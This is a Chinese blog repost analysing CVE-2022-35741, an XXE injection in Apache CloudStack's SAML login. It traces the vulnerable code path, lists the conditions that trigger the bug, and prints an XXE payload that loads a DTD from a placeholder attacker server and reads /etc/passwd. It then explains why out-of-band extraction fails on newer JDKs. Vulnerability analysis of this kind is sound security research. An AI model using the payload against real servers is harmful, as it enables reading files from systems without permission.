CVE-2022-35741 Apache CloudStack SAML XXE注入

最新推荐文章于 2024-07-17 23:45:30 发布
最新推荐文章于 2024-07-17 23:45:30 发布
阅读量569 收藏
点赞数
分类专栏: 漏洞分析及复现 文章标签: apache
原文链接:https://xz.aliyun.com/t/11600
版权

声明

出品|先知社区(ID:Da22le)

以下内容,来自先知社区的Da22le作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

前言

最近爆了好多洞,看到有个XXE注入,正好前段时间刚分析完ZOHO那个XXE正好分析一波

环境搭建

跟着官网安装,直接放弃,最后找到了docker的镜像,直接docker搭起来,不过在docker进行远程调试的时候又出现了巨多坑,整个环境搭了两天,环境为4.17.0.0

docker pull ustcweizhou/cloudstack-simulator 
docker run --name cloudstack-simulator -p 8888:5050 -p 9999:9999 -d ustcweizhou/cloudstack-simulator

其中8888是web端口,9999是要开启的远程调试端口,接下来直接按照以下命令执行即可

//在虚拟机当前目录新建一个supervisord的配置文件vim supervisord.conf//内容如下,里面只是在原先的基础上加了个idea的远程调试,端口为

//在虚拟机当前目录新建一个supervisord的配置文件
vim supervisord.conf
//内容如下,里面只是在原先的基础上加了个idea的远程调试,端口为9999
[supervisord]
nodaemon=true
[program:mysqld]
command=/usr/bin/mysqld_safe
autostart=true
autorestart=true
user=root
[program:cloudstack]
command=/bin/bash -c "export MAVEN_OPTS='-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:9999';mvn -pl client jetty:run -Dsimulator -Dorg.eclipse.jetty.annotations.maxWait=120"
directory=/root
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
user=root
[program:cloudstack-ui]
command=/bin/bash -c "npm run serve"
directory=/root/ui
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
user=root
//将conf文件复制到容器内
docker cp supervisord.conf 容器id:/etc/supervisor/conf.d/supervisord.conf
//进入容器
docker exec -it 容器id bash
//更新supervisord文件配置即可
supervisorctl update

漏洞分析

先来看一下补丁,很明显的XXE注入漏洞,可以看到对response-Message先进行了base64解密,在进行了XML解析,我们逆着来看看哪里调用了decode-SAMLResponse

图片

在org.apache.cloudstack.api.command.SAML2LoginAPIAuthenticatorCmd#processSAMLResponse中,调用了decodeSAMLResponse,继续往上找

图片

在同一个类中找到了authenticate函数,可以看到传入一个idpId,而它是从params中的SAMLResponse中取出的值并且强转为String类型,而params是一个Map类型的,那么SAMLResponse就是一个key,很有可能就是在request中传过来的,我们继续往上找

图片

图片

成功在ApiServlet中找到了调用方式,在其process-RequestInContext函数内调用了authenticate,而且可以看到params里的值就是request转化而来的键值对,并且doGet和doPost最后都调用了process-RequestInContext函数,那么到最后解析xml的值就是我们可以控制的SAMLResponse

图片

图片

图片

接着来看一下wen.xml看看ApiServlet对应的路由,在/api/下会被调用

图片

在web页面中看到网络发的包,拿来一个加上SAMLResponse参数来看看最后触发漏洞需要的条件

图片

在processRequestInContext中,需要满足api-Authenticator != null这个条件才能进入到if语句中,进入if语句才能继续往下走,这就要apiAuthenticator必须有值,我们进入到getAPIAuthenticator来看一下

图片

可以看到必须满足s_authenticators != null && s_authenticators.containsKey(name)条件

apiAuthenticator才不会为空,其中会检测传进来的name是否在s_authenticators内,而name就是我们可控的command,此时command的值需要为以下的几个值才符合条件,可以看到里面有两个值samlsso和samlslo,该漏洞的触发就是需要在开启saml的前提下才会触发而这两个值就是在开启saml后有的值,既然已经知道了触发条件直接将command值改为samlsso

saml开启是在登录web后在全局配置中将saml2.enabled改为true即可

图片

图片

可以看到通过command获取的apiAuthenticator的值

就是能够继续触发漏洞的SAML2LoginAPIAuth-enticatorCmd

图片

最后对SAMLResponse的值进行base64解密后触发XXE漏洞,接下来构造payload触发

图片

payload如下:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://@evilServer:8000/ev.dtd">
    %ext;
]>
<message></message>

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

server端有被访问但是并没有回显,然后就想到了利用ftp协议工具进行回显,但是测试一直不成功,然后发现CloudStack的服务端jdk版本为openjdk 11.0.15,而在高版本中在FtpURLConnection类中进行url检测

图片

会对换行符进行检测,如果有的话直接抛出异常,这里就尝试了很多方法都不能回显,在网上查文章发现好像高版本的XXE无回显确实无法利用,这里在网上看到一篇文章,详细的解释了为什么高版本jdk的ftp无法利用

  1. <7u141或<8u131:不会受文件中\n的影响

  2. >jdk8u131:能创建FTP连接,外带文件内容中含有\n则抛出异常

  3. >jdk8u232:不能创建FTP连接,只要url中含有\n就会抛出异常

图片

在调试的时候发现会在detaiMessage中回显/etc/passwd文件内容,但是并不会回显到前端

图片

长白山攻防实验室
关注
专栏目录
SAML-XXE-Test:专为SAML接口生成的简单XXE测试套件
05-18
SAML-XXE-测试 一个专门为SAML接口生成的简单XXE测试套件。 介绍 是一种基于XML的标记语言,SAML端点使用的XML解析器可能容易受到。 SAML消息通常使用Base64Url()编码进行传输,并且可能会另外放气(取决于所使用的SAML绑定)。 这使得测试XXE漏洞更加困难,因为在评估SAML端点的XXE漏洞时需要将编码应用于每个测试向量。 saml_xxe_test.py自动执行所需的编码,并附带一组预定义的默认测试向量,其中大多数尝试激发带外反馈。 使用saml_xxe_test.py ,安全审核员可以半自动检查SAML端点是否存在XXE漏洞。 以最简单的形式运行saml_xxe_test.py仅需要两个参数: ./saml_xxe_test.py -f url_file.txt -t TARGET 在这里, url_file.txt包含由审核员设置的侦听器服务的
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过复现
m0_67394002的博客
08-14 303
大白话,其实就是在shiro-core-1.9.0.jar中存在一个RegExPatternMatcher类,这个类的Pattern存在带.的正则表达式匹配,如果存在/n或/r字符时,就会判断错误。6月29日,Apache 官方披露 Apache Shiro 权限绕过漏洞(CVE-2022-32532),当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,且正则表达式中携带“.”时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证。渗透机:Kali Linux。.
Apache Spark RCE漏洞CVE-2023-32007)
最新发布
zneVue
07-17 440
Apache Spark 3.4.0 之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter 中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意 shell 命令执行。
CVE-2022-32991
qq_63928796的博客
10-11 3147
发现可能存在sql注入漏洞,进而查看一下源码,mysqli_query没有任何的过滤。进去漏洞页面后正常注册登录,发现了p参数和welcome.php界面。该CMS的welcome.php中存在SQL注入攻击。保存成1.txt用sqlmap梭一下。用Seay源码审计一下。
[春秋云镜]CVE-2022-0543
niubi707的博客
12-13 882
春秋云镜CVE-2022-0543靶场通关
CVE-2022-32430分析
azraelxuemo的博客
12-06 1888
cve分析
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
CVE-2018-11788:Apache Karaf XXE漏洞CVE-2018-11788)
03-18
概括 Apache Karaf是一个现代的多态应用程序容器。 它是由OSGi支持的轻量级,功能强大且可用于企业的容器。 Apache Karaf是一个“产品项目”,提供了完整的交钥匙运行时。 运行时是“多方面的”,这意味着您可以部署不同类型的应用程序:OSGi或非OSGi,Web应用程序,基于服务的等等。 在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入漏洞。 导致解析器不正确地解析XML文档。 受影响的版本 Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6 分析 根据,Apache Karaf默认情况下提供了功能部署程序,该功能允许用户通过将文件直接放置在deploy文件夹中来“热部署”功能XML。 将功能XML放置在deploy文件夹中时,功能部署程序将执行以下操作: 将功能XML注册为功
CVE-2022-25237 Bonitasoft Platform RCE漏洞复现
热爱学习,喜欢折腾!
10-19 1544
Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。
『Java CVECVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2239
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 6133
通过exp实现了对微软目前存在的office-word-2016的成功复现
CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过漏洞复现
qq_60905276的博客
07-16 690
6月29日,Apache官方披露ApacheShiro权限绕过漏洞(CVE-2022-32532),当ApacheShiro中使用RegexRequestMatcher进行权限配置,且正则表达式中携带“.”时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证。pattern存在带.的正则表达式匹配,若source中存在\r或\n字符时,将判断错误。在java中的正则默认情况下.也同样不会包含\n、\r字符,因此在一些场景中,使用正则.的规则就有可能被绕过。)之外的任何单个字符。...
Apache CloudStack多个跨站脚本漏洞CVE-2013-2136)
weixin_30267785的博客
08-12 93
漏洞版本: Apache Group CloudStack 4.1.0 Apache Group CloudStack 4.0.2 Apache Group CloudStack 4.0.1-incubating Apache Group CloudStack 4.0.0-incubating 漏洞描述: BUGTRAQ ID: 61638 CVE(CAN) ID: C...
CVE-2022–26923漏洞分析
阿道夫的博客
01-31 1164
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD域中涉及身份认证标识的问题不止一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD域证书有效时间长,因此对于AD域的提权和权限维持都有很高的利用价值。一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。
CVE-2022-32532 认证绕过漏洞分析
wangluo12138的博客
02-03 1243
CVE-2022-32532 认证绕过漏洞分析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值